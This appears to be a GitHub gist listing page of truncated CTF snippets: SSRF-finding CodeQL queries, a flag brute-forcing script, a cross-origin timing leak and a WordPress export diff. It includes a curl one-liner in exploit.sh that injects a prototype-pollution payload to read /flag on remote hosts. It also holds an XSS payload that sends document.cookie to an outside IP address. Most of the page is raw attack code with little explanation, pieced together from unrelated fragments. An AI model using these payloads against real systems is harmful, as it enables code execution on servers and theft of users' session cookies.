If you can render /debug/answer in server-side, you can get the first flag.
Nginx denies accesses to /debug.
location /debug {
# IP address restriction.
# TODO: add allowed IP addresses here
tyage tyage
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| REPO=$1 | |
| REPO_DIR=repos/$REPO/ | |
| rm -rf $REPO_DIR | |
| mkdir -p $REPO_DIR | |
| cd $REPO_DIR | |
| git clone --depth 1 "https://github.com/$REPO" | |
| curl "https://api.github.com/repos/$REPO/code-scanning/codeql/databases/javascript" -H "accept: application/zip" -L -o codeqldb.zip | |
| unzip -q codeqldb.zip | |
| codeql database analyze ./javascript codeql/javascript-queries --format=sarif-latest --output=codeql.sarif --download |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <script> | |
| chars = '_0123456789abcdefghijklmnopqrstuvwxyz'.split('') | |
| //chars = '_012345678'.split('') | |
| //chars = '9abcdefgh'.split('') | |
| //chars = 'ijklmnopq'.split('') | |
| //chars = 'rstuvwxyz}'.split('') | |
| let prefix = 'SECCON{' | |
| for (let char of chars) { | |
| setTimeout(() => { | |
| let trial = `${prefix}${char}` |
tyage
/ fuz-scroll.js
Last active
January 9, 2021 05:49
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // create viewer element | |
| init = () => { | |
| const renderer = document.querySelector('#renderer') | |
| const viewer = document.createElement('div') | |
| viewer.style = ` | |
| position: absolute; | |
| top: 0; | |
| left: 0; | |
| width: 100%; | |
| height: 100%; |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import javascript | |
| import DataFlow | |
| import DataFlow::PathGraph | |
| class SSRFConfiguration extends TaintTracking::Configuration { | |
| SSRFConfiguration() { this = "SSRFConfiguration" } | |
| override predicate isSource(DataFlow::Node source) { | |
| exists(DataFlow::SourceNode req | | |
| isHTTPRequest(req) and |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import javascript | |
| import DataFlow::PathGraph | |
| // TODO: need to add constraint of "@nguniversal/express-engine" | |
| class Configuration extends TaintTracking::Configuration { | |
| Configuration() { this = "Angular SSRF" } | |
| // string not start with https?:// or // | |
| override predicate isSource(DataFlow::Node source) { | |
| source.getStringValue().regexpMatch("^(?!(https?:|//)).*$") |
tyage
/ angular-of-universe.md
Last active
September 23, 2020 08:28
tyage
/ exploit.sh
Last active
August 11, 2020 12:21
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| curl http://10.13.37.$i:14017/config/validated/json-schema/validate -H 'content-type: application/json' --data '{"$schema":{"type":"object","properties":{"__proto__":{"type":"object","properties":{"outputFunctionName":{"type":"string","default":"x;var buf = Buffer.alloc(128);var fs = process.mainModule.require(`fs`);var fd=fs.openSync(`/fl`+`ag`);fs.readSync(fd, buf, 0, 128);fs.closeSync(fd);return buf.toString();//x"},"path":{"type":"string","default":"/foo"}}}}}}' |
tyage
/ gist:6cedcff95fa3afcb06963dffef57c542
Created
July 12, 2020 08:21
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <script> | |
| setTimeout(() => { | |
| (new Image()).src='/start'; | |
| var start = performance.now(); | |
| fetch("https://www.materialui.co/materialIcons/navigation/close_black_72x72.png", { | |
| mode: "no-cors", | |
| credentials: "include" | |
| }).then((response) => { | |
| var end = performance.now(); |
tyage
/ hugo-export-with-wp-syntax.diff
Last active
May 4, 2020 15:22
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| 1a2 | |
| > | |
| 222,223d222 | |
| < do_action('wp_print_scripts'); | |
| < | |
| 225,228d223 | |
| < | |
| < # remove theCode | |
| < $content = preg_replace('/<p class="theCode[^<]+<\/p>/', '', $content); | |
| < |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/local/bin/zsh | |
| command=( | |
| #cookie "PHPSESSID" "rsha06bn3700l9jtvpvsottf7q" | |
| #header "Content*" "compressed" | |
| header "HTTP/ 999 " "found" | |
| #header "HTTP/0.9 " "OK" | |
| #header "Connection" "close" | |
| body "<script\r\n>location.href='//35.209.128.35:12345/?'+document.cookie\r\n</script" b | |
| hello 1 1 |